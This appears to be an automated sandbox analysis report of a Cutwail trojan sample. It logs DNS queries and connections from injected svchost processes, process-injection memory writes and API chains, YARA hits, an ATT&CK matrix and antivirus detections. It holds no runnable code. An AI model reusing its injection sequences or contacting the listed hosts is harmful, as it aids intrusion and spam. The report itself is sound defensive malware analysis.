                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: amele.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: uhsa.edu.ag
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: skgm.ru
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: pleszew.policja.gov.pl
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: icd-host.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 52.219.88.107 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.212.145.129 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 13.56.33.8 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: burstner.ru
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.154.163.204 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 34.205.242.146 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: xinhui.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 193.107.88.74 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: aluminox.es
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ie-roi.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mijash3.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 219.94.128.216 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: xult.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail.protonmail.ch
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: shanks.co.uk
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.22.232.175 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 138.201.65.187 443
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 23.239.201.14 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: vivastay.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 59.106.13.169 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 49.212.235.175 443
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: e-asset.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 193.70.68.254 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 77.72.4.226 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: plaske.ua
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: touchfam.ca
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 154.88.50.199 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.yumgiskor.kz
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: indonesiamedia.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: a-domani.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: nettlinx.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: softizer.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: rokoron.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: k-nikko.com
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 28CA008Jump to behavior
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2B5B008Jump to behavior
                      Source: C:\Users\user\pigalicapi.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 400000Jump to behavior
                      Source: C:\Users\user\pigalicapi.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2DAB008Jump to behavior
                      Source: C:\Users\user\pigalicapi.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 400000Jump to behavior
                      Source: C:\Users\user\pigalicapi.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 28E0008Jump to behavior
                      Source: C:\Users\user\pigalicapi.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 400000Jump to behavior
                      Source: C:\Users\user\pigalicapi.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2DCF008Jump to behavior
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\pigalicapi.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\pigalicapi.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\pigalicapi.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 7EFF0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 13140000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 13140000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 13140000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 7E6E0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 13140000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 13140000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 13140000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 7EBD0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 13140000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 13140000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 13140000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\pigalicapi.exeThread APC queued: target process: C:\Windows\SysWOW64\svchost.exeJump to behavior
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeCode function: 0_2_040020B0 GetEnvironmentVariableA,lstrcatA,lstrcatA,lstrcatA,VirtualAlloc,CreateProcessA,VirtualFree,VirtualAllocEx,VirtualAllocEx,TerminateProcess,CloseHandle,CloseHandle,VirtualFree,WriteProcessMemory,TerminateProcess,CloseHandle,CloseHandle,VirtualFree,VirtualFree,GetThreadContext,TerminateProcess,CloseHandle,CloseHandle,WriteProcessMemory,TerminateProcess,CloseHandle,CloseHandle,SetThreadContext,ResumeThread,TerminateProcess,CloseHandle,CloseHandle,0_2_040020B0
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeCode function: 0_2_04002510 VirtualAlloc,VirtualAllocEx,VirtualAllocEx,VirtualFree,WriteProcessMemory,VirtualFree,VirtualFree,CreateRemoteThread,0_2_04002510
                      Source: C:\Users\user\pigalicapi.exeCode function: 1_2_024E2510 VirtualAlloc,VirtualAllocEx,VirtualAllocEx,VirtualFree,WriteProcessMemory,VirtualFree,VirtualFree,CreateRemoteThread,1_2_024E2510
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Users\user\pigalicapi.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Users\user\pigalicapi.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Users\user\pigalicapi.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\pigalicapi.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\pigalicapi.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeCode function: 0_2_0040D450 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_0040D450
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeCode function: 0_2_04008F80 GetVersionExA,GetSystemInfo,lstrcatA,lstrcatA,lstrcatA,GetSystemMetrics,lstrcatA,GetSystemMetrics,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrcatA,lstrcatA,lstrlenA,lstrcatA,0_2_04008F80

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 1.2.pigalicapi.exe.24c1e88.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.6gjnnBAbpc.exe.10004088.14.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.pigalicapi.exe.10004088.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.pigalicapi.exe.f11e88.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.pigalicapi.exe.10004088.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.pigalicapi.exe.24e0000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.pigalicapi.exe.24c0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.pigalicapi.exe.f11e88.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.pigalicapi.exe.f30000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.pigalicapi.exe.10004088.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.6gjnnBAbpc.exe.2790000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.pigalicapi.exe.10004088.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.svchost.exe.4000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.svchost.exe.4000000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.svchost.exe.4000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.6gjnnBAbpc.exe.4000000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.6gjnnBAbpc.exe.2791e88.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.6gjnnBAbpc.exe.2791e88.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.pigalicapi.exe.f10000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.pigalicapi.exe.f10000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.6gjnnBAbpc.exe.10004088.14.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.pigalicapi.exe.24c0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.6gjnnBAbpc.exe.2790000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.pigalicapi.exe.24c1e88.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.svchost.exe.4000000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.svchost.exe.4000000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.671122999.0000000010004000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.642040224.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.642410962.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.669497358.0000000010004000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.651890416.0000000002790000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.670270360.0000000010004000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts3
                      Native API
                      1
                      Windows Service
                      1
                      Windows Service
                      111
                      Masquerading
                      OS Credential Dumping1
                      System Time Discovery
                      Remote Services11
                      Archive Collected Data
                      Exfiltration Over Other Network Medium21
                      Encrypted Channel
                      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                      Data Encrypted for Impact
                      Default AccountsScheduled Task/Job1
                      Registry Run Keys / Startup Folder
                      711
                      Process Injection
                      21
                      Virtualization/Sandbox Evasion
                      LSASS Memory221
                      Security Software Discovery
                      Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth4
                      Ingress Tool Transfer
                      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)1
                      Registry Run Keys / Startup Folder
                      711
                      Process Injection
                      Security Account Manager21
                      Virtualization/Sandbox Evasion
                      SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration4
                      Non-Application Layer Protocol
                      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)2
                      Obfuscated Files or Information
                      NTDS2
                      Process Discovery
                      Distributed Component Object ModelInput CaptureScheduled Transfer25
                      Application Layer Protocol
                      SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                      Software Packing
                      LSA Secrets1
                      Application Window Discovery
                      SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials1
                      Remote System Discovery
                      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                      System Network Configuration Discovery
                      Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem15
                      System Information Discovery
                      Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 831928 Sample: 6gjnnBAbpc.exe Startdate: 22/03/2023 Architecture: WINDOWS Score: 100 67 oh28ya.com 2->67 69 magicomm.co.uk 2->69 71 346 other IPs or domains 2->71 107 Snort IDS alert for network traffic 2->107 109 Antivirus detection for URL or domain 2->109 111 Multi AV Scanner detection for submitted file 2->111 117 3 other signatures 2->117 8 6gjnnBAbpc.exe 3 68 2->8         started        13 pigalicapi.exe 48 2->13         started        15 pigalicapi.exe 48 2->15         started        signatures3 113 System process connects to network (likely due to code injection or exploit) 69->113 115 Tries to resolve many domain names, but no domain seems valid 69->115 process4 dnsIp5 81 201 other IPs or domains 8->81 49 C:\Users\user\pigalicapi.exe, PE32 8->49 dropped 51 C:\Users\...\pigalicapi.exe:Zone.Identifier, ASCII 8->51 dropped 119 Early bird code injection technique detected 8->119 121 Found stalling execution ending in API Sleep call 8->121 123 Contains functionality to inject threads in other processes 8->123 139 3 other signatures 8->139 17 svchost.exe 8->17         started        21 svchost.exe 8->21         started        73 nts-web.net 13->73 75 wolffkran.de 13->75 83 183 other IPs or domains 13->83 125 Multi AV Scanner detection for dropped file 13->125 127 Machine Learning detection for dropped file 13->127 129 Writes to foreign memory regions 13->129 131 Queues an APC in another process (thread injection) 13->131 23 svchost.exe 13->23         started        25 svchost.exe 13->25         started        77 www.medisa.info 15->77 79 www.kernsafe.com 15->79 85 170 other IPs or domains 15->85 133 Injects a PE file into a foreign processes 15->133 27 svchost.exe 15->27         started        file6 135 System process connects to network (likely due to code injection or exploit) 77->135 137 Tries to resolve many domain names, but no domain seems valid 79->137 signatures7 process8 dnsIp9 53 smtp1.sbc.mail.am0.yahoodns.net 17->53 59 5 other IPs or domains 17->59 103 System process connects to network (likely due to code injection or exploit) 17->103 105 Injects a PE file into a foreign processes 17->105 29 svchost.exe 12 17->29         started        33 svchost.exe 17->33         started        35 svchost.exe 17->35         started        37 svchost.exe 17->37         started        55 smtp.mail.global.gm0.yahoodns.net 21->55 61 2 other IPs or domains 21->61 63 8 other IPs or domains 23->63 39 svchost.exe 23->39         started        41 svchost.exe 23->41         started        43 svchost.exe 23->43         started        45 svchost.exe 23->45         started        57 samtv.ro 27->57 65 3 other IPs or domains 27->65 47 4 other processes 27->47 signatures10 process11 dnsIp12 87 86 other IPs or domains 29->87 141 System process connects to network (likely due to code injection or exploit) 29->141 89 100 other IPs or domains 33->89 91 114 other IPs or domains 35->91 93 304 other IPs or domains 37->93 95 57 other IPs or domains 39->95 97 67 other IPs or domains 41->97 99 54 other IPs or domains 43->99 101 38 other IPs or domains 45->101 signatures13

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      6gjnnBAbpc.exe18%VirustotalBrowse
                      6gjnnBAbpc.exe30%ReversingLabsWin32.Trojan.Cutwail
                      6gjnnBAbpc.exe100%Joe Sandbox ML
                      SourceDetectionScannerLabelLink
                      C:\Users\user\pigalicapi.exe100%Joe Sandbox ML
                      C:\Users\user\pigalicapi.exe30%ReversingLabsWin32.Trojan.Cutwail
                      SourceDetectionScannerLabelLinkDownload
                      6.3.svchost.exe.2fe0000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                      3.3.svchost.exe.3aa0000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                      10.2.svchost.exe.13140000.1.unpack100%AviraTR/Proxy.GenDownload File
                      22.2.svchost.exe.406b200.3.unpack100%AviraTR/Patched.Ren.GenDownload File
                      11.2.svchost.exe.13140000.1.unpack100%AviraTR/Proxy.GenDownload File
                      15.2.svchost.exe.13140000.1.unpack100%AviraTR/Proxy.GenDownload File
                      2.3.pigalicapi.exe.4770000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      3.2.svchost.exe.406b200.2.unpack100%AviraTR/Patched.Ren.GenDownload File
                      1.2.pigalicapi.exe.10010318.12.unpack100%AviraTR/Downloader.GenDownload File
                      12.2.svchost.exe.4004000.2.unpack100%AviraTR/Patched.Ren.GenDownload File
                      17.2.svchost.exe.7ebd0000.1.unpack100%AviraTR/ATRAPS.GenDownload File
                      16.2.svchost.exe.13140000.1.unpack100%AviraTR/Proxy.GenDownload File
                      0.2.6gjnnBAbpc.exe.c70000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      1.2.pigalicapi.exe.24c1e88.2.unpack100%AviraTR/Patched.Ren.GenDownload File
                      3.3.svchost.exe.55a0000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      2.2.pigalicapi.exe.f3e290.5.unpack100%AviraTR/Downloader.GenDownload File
                      0.2.6gjnnBAbpc.exe.10004088.14.unpack100%AviraTR/Patched.Ren.GenDownload File
                      19.2.svchost.exe.4000000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                      11.2.svchost.exe.4000000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                      2.2.pigalicapi.exe.10004088.11.unpack100%AviraTR/Patched.Ren.GenDownload File
                      22.2.svchost.exe.4050e00.4.unpack100%AviraTR/Patched.Ren.GenDownload File
                      3.2.svchost.exe.400000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      0.3.6gjnnBAbpc.exe.b00000.8.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      1.2.pigalicapi.exe.10004088.11.unpack100%AviraTR/Patched.Ren.GenDownload File
                      0.3.6gjnnBAbpc.exe.c70000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      7.3.svchost.exe.56a0000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      12.2.svchost.exe.4050e00.4.unpack100%AviraTR/Patched.Ren.GenDownload File
                      3.3.svchost.exe.3bf0000.7.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                      0.2.6gjnnBAbpc.exe.400e290.12.unpack100%AviraTR/Downloader.GenDownload File
                      1.3.pigalicapi.exe.29f0000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      22.2.svchost.exe.4004000.5.unpack100%AviraTR/Patched.Ren.GenDownload File
                      3.3.svchost.exe.3bf0000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                      2.2.pigalicapi.exe.10010318.12.unpack100%AviraTR/Downloader.GenDownload File
                      6.2.svchost.exe.4050e00.2.unpack100%AviraTR/Patched.Ren.GenDownload File
                      3.3.svchost.exe.54a0000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      7.2.svchost.exe.4050e00.3.unpack100%AviraTR/Patched.Ren.GenDownload File
                      2.3.pigalicapi.exe.4740000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      1.2.pigalicapi.exe.24e0000.4.unpack100%AviraTR/Spy.GenDownload File
                      6.2.svchost.exe.4000000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      1.3.pigalicapi.exe.46f0000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      1.3.pigalicapi.exe.47212b9.2.unpack100%AviraTR/Patched.Ren.GenDownload File
                      7.2.svchost.exe.4000000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      22.2.svchost.exe.4000000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      14.2.svchost.exe.4000000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                      2.2.pigalicapi.exe.f11e88.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                      9.2.svchost.exe.13140000.1.unpack100%AviraTR/Proxy.GenDownload File
                      2.2.pigalicapi.exe.f30000.4.unpack100%AviraTR/Spy.GenDownload File
                      3.3.svchost.exe.54a0000.0.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
                      7.3.svchost.exe.54a0000.0.unpack100%AviraTR/ATRAPS.GenDownload File
                      18.2.svchost.exe.4000000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                      6.3.svchost.exe.55a0000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      1.3.pigalicapi.exe.46f04b9.5.unpack100%AviraTR/Patched.Ren.GenDownload File
                      0.2.6gjnnBAbpc.exe.2790000.6.unpack100%AviraTR/Patched.Ren.GenDownload File
                      6.2.svchost.exe.406b200.3.unpack100%AviraTR/Patched.Ren.GenDownload File
                      19.2.svchost.exe.13140000.1.unpack100%AviraTR/Proxy.GenDownload File
                      3.3.svchost.exe.3bf0000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                      14.2.svchost.exe.13140000.1.unpack100%AviraTR/Proxy.GenDownload File
                      1.2.pigalicapi.exe.29f0000.8.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      21.2.svchost.exe.13140000.1.unpack100%AviraTR/Proxy.GenDownload File
                      0.2.6gjnnBAbpc.exe.3f50000.10.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      3.2.svchost.exe.4036a00.6.unpack100%AviraTR/Patched.Ren.GenDownload File
                      2.2.pigalicapi.exe.4770000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      6.2.svchost.exe.400000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      3.2.svchost.exe.4004000.5.unpack100%AviraTR/Patched.Ren.GenDownload File
                      6.3.svchost.exe.54a0000.0.unpack100%AviraTR/ATRAPS.GenDownload File
                      21.2.svchost.exe.4000000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                      7.3.svchost.exe.6e00000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      3.2.svchost.exe.4050e00.3.unpack100%AviraTR/Patched.Ren.GenDownload File
                      0.2.6gjnnBAbpc.exe.4000000.11.unpack100%AviraTR/Spy.GenDownload File
                      8.2.svchost.exe.7eff0000.1.unpack100%AviraTR/ATRAPS.GenDownload File
                      7.3.svchost.exe.2fe0000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
